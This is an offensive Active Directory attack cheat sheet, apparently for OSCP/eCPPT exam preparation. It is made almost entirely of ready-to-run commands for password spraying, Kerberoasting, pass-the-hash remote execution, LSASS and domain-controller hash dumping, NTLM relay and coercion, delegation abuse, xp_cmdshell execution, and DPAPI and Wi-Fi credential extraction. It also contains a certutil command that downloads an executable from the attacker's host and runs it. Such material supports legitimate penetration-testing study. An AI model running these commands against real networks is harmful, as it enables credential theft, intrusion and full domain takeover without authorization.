######################################################################
# 03 — ACTIVE DIRECTORY & WINDOWS NETWORK ATTACKS  
# OSCP 2025 — ULTRA EDITION (FINAL + ECPPT AD ADDITIONS INCLUDED)
######################################################################

This version includes:
✔ Full AD Enumeration  
✔ SMB/LDAP/WinRM/Kerberos workflow  
✔ Kerberoast / AS-REP roast / FAST-PAC checks  
✔ SMB/LDAP signing (relay pre-check)  
✔ ADCS ESC1–ESC14 (complete)  
✔ Delegation (RBCD / KCD)  
✔ Coercion attacks  
✔ Pass-the-Hash (NTLM & Kerberos)  
✔ MSSQL lateral movement  
✔ NTLM Relay & ADCS relay  
✔ LSASS dumping (nanodump, procdump, pypykatz)  
✔ Windows PrivEsc (OSCP safe)  
✔ BloodHound optimized collection  
✔ **🔥 Added from eCPPT: LDAP user dump, domain trusts enumeration, certutil/wget/ftp revshell upload techniques, malicious .asp upload, Metasploit local exploit workflow, secretsdump usage, Keepass cracking workflow, MySQL/WP credential hunting, DC-only dump commands (just AD parts), OpenSMTPD RCE (AD foothold cases), WordPress admin foothold to AD pivot**  
######################################################################


======================================================================
# 1. AD DISCOVERY & INITIAL ENUMERATION
======================================================================

-------------------------------
# 1.1 Nmap — AD-Related Ports
-------------------------------
nmap -sC -sV -Pn -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -oN nmap_ad_$targetip.txt $targetip


-------------------------------
# 1.2 Host & Domain Fingerprinting
-------------------------------
netexec smb $targetip


-------------------------------
# 1.3 SMB/LDAP Signing Status (Relay Check)
-------------------------------
netexec smb $targetip --signing
netexec ldap $targetip --signing


-------------------------------
# 1.4 SMB Shares
-------------------------------
smbclient -L //$targetip/ -N
smbmap -H $targetip
netexec smb $targetip --shares


-------------------------------
# 1.5 SYSVOL & GPP Credential Hunting
-------------------------------
smbclient //$targetip/SYSVOL -N -c "recurse;ls"
grep -R "cpassword" .
find . -name "*.xml"
gpp-decrypt <HASH>


-------------------------------
# 1.6 NetExec Discovery Modules
-------------------------------
netexec smb $targetip -M spider
netexec smb $targetip --users
netexec smb $targetip --groups
netexec smb $targetip --laps
netexec smb $targetip -M webdav


-------------------------------
# 1.7 Kerberos Pre-Flight (Time Sync)
-------------------------------
ntpdate -q $targetip


-------------------------------
# 🔥 (AD ADD — eCPPT) Enumerate Domain Trusts Early
-------------------------------
nltest /domain_trusts
nltest /trusted_domains
nltest /dsgetdc:$domain


======================================================================
# 2. LDAP ENUMERATION
======================================================================

-------------------------------
# 2.1 Get baseDN
-------------------------------
ldapsearch -x -H ldap://$targetip -s base


-------------------------------
# 2.2 Users
-------------------------------
ldapsearch -x -H ldap://$targetip -b "$basedn" "(objectClass=user)" sAMAccountName description mail memberOf


-------------------------------
# 2.3 Groups
-------------------------------
ldapsearch -x -H ldap://$targetip -b "$basedn" "(objectClass=group)" cn member memberOf


-------------------------------
# 2.4 GPO Enumeration
-------------------------------
ldapsearch -x -H ldap://$targetip -b "$basedn" "(objectClass=groupPolicyContainer)" gPCFileSysPath displayName


-------------------------------
# 2.5 DNS Records
-------------------------------
ldapsearch -x -H ldap://$targetip -b "DC=DomainDnsZones,$basedn"


-------------------------------
# 🔥 (AD ADD — eCPPT) Filter Only Users Under an OU
-------------------------------
ldapsearch -x -H ldap://$targetip -D "$domain\\$user" -w "$password" \
  -b "OU=Employees,$basedn" "(objectClass=user)" sAMAccountName distinguishedName userAccountControl pwdLastSet


======================================================================
# 3. KERBEROS ATTACKS
======================================================================

-------------------------------
# 3.1 Kerbrute User Enumeration
-------------------------------
kerbrute userenum -d $domain --dc $targetip users.txt


-------------------------------
# 3.2 Password Spraying
-------------------------------
kerbrute passwordspray -d $domain --dc $targetip users.txt 'Password1!'


-------------------------------
# 3.3 AS-REP Roasting
-------------------------------
impacket-GetNPUsers $domain/ -dc-ip $targetip -no-pass -usersfile users.txt -format john -outputfile asrep.txt


-------------------------------
# 3.4 Kerberoasting (SPNs)
-------------------------------
impacket-GetUserSPNs $domain/$user:"$password" -dc-ip $targetip -request -format john -outputfile kerberoast.txt


-------------------------------
# 3.5 Request TGT / ST (Delegation)
-------------------------------
impacket-getTGT $domain/$user:"$password"
impacket-getST -spn <service>/<fqdn> -impersonate Administrator $domain/$user:"$password" -dc-ip $targetip


-------------------------------
# 3.6 Detect FAST/PAC Enforcement
-------------------------------
netexec kerberos $targetip --kerberos


======================================================================
# 4. HASHES & LATERAL MOVEMENT
======================================================================

-------------------------------
# 4.1 Dump SAM / LSASS / NTDS via NetExec
-------------------------------
netexec smb $targetip -u $user -p "$password" --sam
netexec smb $targetip -u $user -p "$password" -M lsassy
netexec smb $targetip -u $user -p "$password" -M ntdsutil


-------------------------------
# 🔥 (AD ADD — eCPPT) Dump ONLY DC Hashes
-------------------------------
python3 secretsdump.py -just-dc-ntlm $domain/$user:"$password"@$targetip


======================================================================
# 4.5 PASS-THE-HASH (NTLM + Kerberos Tickets)
======================================================================

### ✔ NTLM PTH — NO TIME SYNC NEEDED

# SMB RCE
impacket-psexec $domain/$user@$targetip -hashes <LM:NTLM>

# WMI Exec
impacket-wmiexec $domain/$user@$targetip -hashes <LM:NTLM>

# WinRM via Hash
evil-winrm -i $targetip -u $user -H <NTLM>

# NetExec PTH
netexec smb $targetip -u $user -H <NTLM>
netexec smb $targetip -u $user -H <NTLM> --sam
netexec smb $targetip -u $user -H <NTLM> -M lsassy


### ✔ Kerberos PTH (Pass-The-Key) — TIME SYNC REQUIRED

# sync clock
ntpdate -q $targetip

# request TGT using hash
impacket-getTGT $domain/$user -hashes <LM:NTLM>

# set ticket
export KRB5CCNAME=$user.ccache

# get service ticket
impacket-getST -spn cifs/$target -impersonate Administrator $domain/$user -dc-ip $targetip


======================================================================
# 5. WINRM & RDP
======================================================================

# 5.1 Check WinRM
netexec winrm $targetip

# 5.2 WinRM Credentials
evil-winrm -i $targetip -u $user -p "$password"

# 5.3 WinRM Hash
evil-winrm -i $targetip -u $user -H <NTLM>

# 5.4 Certificate Auth
evil-winrm -i $targetip -c cert.pem -k key.pem

# 5.5 RDP
xfreerdp /v:$targetip /u:$user /p:"$password" /dynamic-resolution +clipboard


======================================================================
# 6. MSSQL ATTACKS
======================================================================

# Windows Auth
mssqlclient.py $domain/$user:"$password"@$targetip -windows-auth

# Enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';

# Linked server
EXEC sp_linkedservers;
EXEC ('xp_cmdshell ''whoami''') AT [LINKEDSERVER];


======================================================================
# 7. ADCS (ESC1–ESC14)
======================================================================

certipy find -u $user -p "$password" -dc-ip $targetip -vulnerable -enabled
certipy req -u $user -p "$password" -dc-ip $targetip -template $template -out cert.pfx
certipy auth -pfx cert.pfx -dc-ip $targetip
certipy shadow -u $user -p "$password" -dc-ip $targetip -account Administrator
certipy find -u $user -p "$password" -dc-ip $targetip -stdout -json out.json


======================================================================
# 8. DELEGATION ATTACKS
======================================================================

# 8.1 RBCD
addcomputer.py -dc-ip $targetip $domain/$user:"$password" -computer-name 'MACHINE$' -computer-pass 'Pass123!'
impacket-rbcd -delegate-from 'MACHINE$' -delegate-to 'SERVER$' -dc-ip $targetip -action write -user $user -password "$password"
getST.py -spn cifs/SERVER.$domain -impersonate Administrator "$domain/MACHINE$":"Pass123!"

# 8.2 KCD
impacket-getST -impersonate Administrator -spn http/web.$domain $domain/$user:"$password"

# 8.3 Coercion
printerbug.py $domain/$user:"$password"@$targetip $localip
dfscoerce.py $domain/$user:"$password"@$targetip $localip
petitpotam.py -u $user -p "$password" -d $domain -dc-ip $targetip $localip


======================================================================
# 9. NTLM RELAY (SMB → LDAP + ADCS)
======================================================================

responder -I tun0 -wd -v
ntlmrelayx.py -t ldap://$targetip --no-http-server
ntlmrelayx.py --adcs --template "User" -t http://$targetip --no-http-server
iptables -A INPUT -p tcp --dport 445 -j DROP


======================================================================
# 10. DPAPI Credential Extraction
======================================================================

pypykatz live lsa
pypykatz dpapi chrome -d .
pypykatz dpapi rdp -d .
netsh wlan show profiles
netsh wlan show profile name="<SSID>" key=clear


======================================================================
# 11. LSASS DUMPING
======================================================================

nanodump.exe --write C:\Windows\Temp\lsass.dmp
procdump.exe -ma lsass.exe lsass.dmp
pypykatz lsa minidump lsass.dmp


======================================================================
# 12. WINDOWS PRIVILEGE ESCALATION
======================================================================

whoami /priv
PrintSpoofer.exe -i -c cmd
RoguePotato.exe
findstr /si /i "password" *.txt *.xml *.ini
wmic service get name,displayname,pathname,startmode

# WinPEAS
certutil -urlcache -f http://$localip/winpeas.exe C:\Temp\winpeas.exe && C:\Temp\winpeas.exe


======================================================================
# 13. CROSS-DOMAIN & FOREST
======================================================================

nltest /domain_trusts
nltest /trusted_domains


======================================================================
# 14. BLOODHOUND
======================================================================

bloodhound-python -d $domain -u $user -p "$password" -ns $targetip -c All


======================================================================
# 15. OSCP ATTACK FLOW
======================================================================

1) SMB/LDAP Enumeration  
2) Kerbrute  
3) Password Spray  
4) AS-REP Roast  
5) Kerberoast  
6) SYSVOL/GPP  
7) LDAP Priv Groups  
8) ADCS ESC1–14  
9) Delegation (RBCD/KCD)  
10) Coercion  
11) NTLM Relay / ADCS Relay  
12) Lateral Movement (SMB/WMI/WinRM/PTH)  
13) Dump Hashes  
14) DPAPI / Browser / RDP creds  
15) BloodHound → DA  
16) DCSync  
######################################################################
# END — COMPLETE AD ATTACK PLAYBOOK (OSCP 2025 + ECPPT ADDITIONS)
######################################################################


######################################################################
# 16 — ADIDNS ENUMERATION & DNSADMINS PRIVILEGE ESCALATION (SAFE)
######################################################################

WHAT IS THIS?
Active Directory-Integrated DNS stores computer, service, and Kerberos SRV records.  
Misconfigurations or overly-permissive ACLs can allow attackers to manipulate DNS,  
which may indirectly lead to privilege escalation or misrouting authentication.

WHAT DO YOU GET?
✔ All DNS records (A, CNAME, SRV, etc.)  
✔ Ownership / ACL information on DNS objects  
✔ DNSAdmins group membership (high-value privilege)  
✔ Validates if DNS is misconfigured


======================================================================
# 16.1 ENUMERATE ADIDNS ZONES & RECORDS
======================================================================

# All DNS nodes
ldapsearch -x -H ldap://$targetip -b "DC=DomainDnsZones,$basedn" "(objectClass=dnsNode)" name dnsRecord

# Dump DNS zone names (PS)
Get-DnsServerZone

# Dump DNS records (PS)
Get-DnsServerResourceRecord -ZoneName $domain

# Impacket enumeration
dnsdump.py $domain/$user:"$password"@$targetip


======================================================================
# 16.2 CHECK DNSADMINS MEMBERSHIP
======================================================================

ldapsearch -x -H ldap://$targetip -b "CN=DNSAdmins,CN=Users,$basedn" "(objectClass=*)" member

netexec ldap $targetip --groups | grep -i dns

Get-ADGroupMember "DNSAdmins"


======================================================================
# 16.3 ENUMERATE DNS NODE ACL (OWNERSHIP CHECK)
======================================================================

Get-ACL "AD:\CN=www,CN=MicrosoftDNS,DC=DomainDnsZones,$basedn" | fl
######################################################################
# 17 — DCSYNC & DCSHADOW (SAFE ENUMERATION)
######################################################################

WHAT IS THIS?
DCSync lets an attacker impersonate a domain controller and request password hashes.  
DCShadow lets attackers register a fake DC to push malicious directory changes.

WHAT DO YOU GET?
✔ Which accounts have replication privileges  
✔ Who can potentially perform a DCSync attack  
✔ Identify suspicious ACL rights on domain objects  
✔ Zero exploitation — only discovery


======================================================================
# 17.1 ENUMERATE WHO HAS DCSYNC PRIVILEGES
======================================================================

# Administrators / Domain Admins / Enterprise Admins
ldapsearch -x -H ldap://$targetip -b "$basedn" "(cn=Administrators)" member
ldapsearch -x -H ldap://$targetip -b "$basedn" "(cn=Domain Admins)" member
ldapsearch -x -H ldap://$targetip -b "$basedn" "(cn=Enterprise Admins)" member

# NetExec view
netexec ldap $targetip --groups

# Check your group's token privileges
whoami /groups


======================================================================
# 17.2 ENUMERATE REPLICATION-RELATED ACLs (SAFE)
======================================================================

# Dump security descriptor of domain (checks for DS-Replication rights)
ldapsearch -x -H ldap://$targetip -b "$basedn" "(objectClass=domain)" nTSecurityDescriptor

# PowerView equivalent (if available)
Get-ObjectAcl -DistinguishedName "$basedn" | fl
######################################################################
# 18 — ACL ABUSE (GENERICALL / WRITEDACL / WRITEOWNER) — SAFE ENUM
######################################################################

WHAT IS THIS?
ACLs (Access Control Lists) define who can modify AD objects.  
If a low-privileged account has write rights over users, groups, or GPOs,  
it can often escalate to higher privileges.

WHAT DO YOU GET?
✔ Detect misconfigurations granting you excessive rights  
✔ Identify objects where you have GenericWrite / WriteDACL / WriteOwner  
✔ No exploitation — simply mapping access


======================================================================
# 18.1 ENUMERATE FULL ACL OF ANY OBJECT
======================================================================

ldapsearch -x -H ldap://$targetip -b "$dn" "(objectClass=*)" nTSecurityDescriptor

Get-ObjectAcl -DistinguishedName "$dn" | fl


======================================================================
# 18.2 ENUMERATE ACL OF HIGH-VALUE TARGETS
======================================================================

# Domain
ldapsearch -x -H ldap://$targetip -b "$basedn" "(objectClass=domain)" nTSecurityDescriptor

# Domain Controllers OU
ldapsearch -x -H ldap://$targetip -b "OU=Domain Controllers,$basedn" "(objectClass=*)" nTSecurityDescriptor

######################################################################
# 19 — LAPS ENUMERATION & MISCONFIGURATION DISCOVERY (SAFE)
######################################################################

WHAT IS THIS?
LAPS stores local administrator passwords for machines in AD attributes.  
If ACLs are misconfigured, non-privileged users can read these passwords  
→ instant local admin access → lateral movement → potential DA.

WHAT DO YOU GET?
✔ Which machines use LAPS  
✔ Who can read LAPS passwords  
✔ If your user has LAPS read rights


======================================================================
# 19.1 ENUMERATE MACHINES WITH LAPS ENABLED
======================================================================

ldapsearch -x -H ldap://$targetip -b "$basedn" "(ms-Mcs-AdmPwd=*)" name ms-Mcs-AdmPwdExpirationTime


======================================================================
# 19.2 ENUMERATE WHO CAN READ LAPS PASSWORDS
======================================================================

Find-AdmPwdExtendedRights -ResolvePrincipals

ldapsearch -x -H ldap://$targetip -b "CN=Computers,$basedn" "(objectClass=*)" nTSecurityDescriptor

######################################################################
# 20 — BACKUP OPERATORS → SYSTEM → DA (SAFE ENUM)
######################################################################

WHAT IS THIS?
Backup Operators can read *any* file, including SAM/SECURITY/SYSTEM.  
They can also start services.  
This often allows escalation to SYSTEM → hash extraction → lateral movement.

WHAT DO YOU GET?
✔ Identify if any user is a Backup Operator  
✔ Check if your token has SeBackupPrivilege  
✔ Map potential escalation paths


======================================================================
# 20.1 ENUMERATE BACKUP OPERATORS MEMBERSHIP
======================================================================

ldapsearch -x -H ldap://$targetip -b "CN=Backup Operators,CN=Builtin,$basedn" "(objectClass=*)" member

Get-ADGroupMember "Backup Operators"


======================================================================
# 20.2 CHECK PRIVILEGES OF CURRENT USER
======================================================================

whoami /priv

netexec smb $targetip -u $user -p "$password" --local-auth

######################################################################
# 21 — AD MITM ATTACK SURFACE (SAFE ENUMERATION)
######################################################################

WHAT IS THIS?
Man-in-the-middle attack surface in AD is mostly caused by  
NTLM relay, lack of SMB/LDAP signing, and multicast poisoning.

WHAT DO YOU GET?
✔ Check SMB signing status  
✔ Check LDAP signing status  
✔ Identify multicast protocol exposure  
✔ Helps determine relay feasibility (safe)


======================================================================
# 21.1 SMB SIGNING STATUS
======================================================================

netexec smb $targetip --signing

nmap --script smb2-security-mode -p445 $targetip


======================================================================
# 21.2 LDAP SIGNING / CHANNEL BINDING
======================================================================

netexec ldap $targetip --signing

nmap -p389 --script ldap-rootdse $targetip


======================================================================
# 21.3 MULTICAST ENUM (LLMNR / NBNS)
======================================================================

tcpdump -i tun0 "udp port 5355"   # LLMNR
tcpdump -i tun0 "udp port 137"    # NBNS

######################################################################
# 22 — PASSWORD POLICY & PASSWORD ANALYTICS (SAFE)
######################################################################

WHAT IS THIS?
AD password policy determines complexity, lockout, reuse rules.  
Fine-grained password policies may apply to specific OUs or users.  
Knowing this helps build accurate spraying strategies and find weak creds.

WHAT DO YOU GET?
✔ Domain-wide password policy  
✔ Fine-grained password policies  
✔ Identify weak/seasonal credential patterns  
✔ Prepare better attack chains


======================================================================
# 22.1 ENUMERATE DOMAIN PASSWORD POLICY
======================================================================

GetADUsers.py $domain/$user:"$password" -dc-ip $targetip -all

Get-ADDefaultDomainPasswordPolicy

netexec ldap $targetip --pass-pol


======================================================================
# 22.2 ENUMERATE FGPP (FINE-GRAINED PASSWORD POLICIES)
======================================================================

ldapsearch -x -H ldap://$targetip -b "CN=Password Settings Container,CN=System,$basedn" "(objectClass=*)" msDS-PasswordSettings

Get-ADFineGrainedPasswordPolicy -Filter *


======================================================================
# 22.3 IDENTIFY WEAK PASSWORD PATTERNS
======================================================================

grep -Ei "(spring|summer|autumn|winter|202[0-5])" cracked_passwords.txt

grep -R "password" /mnt/sysvol 2>/dev/null
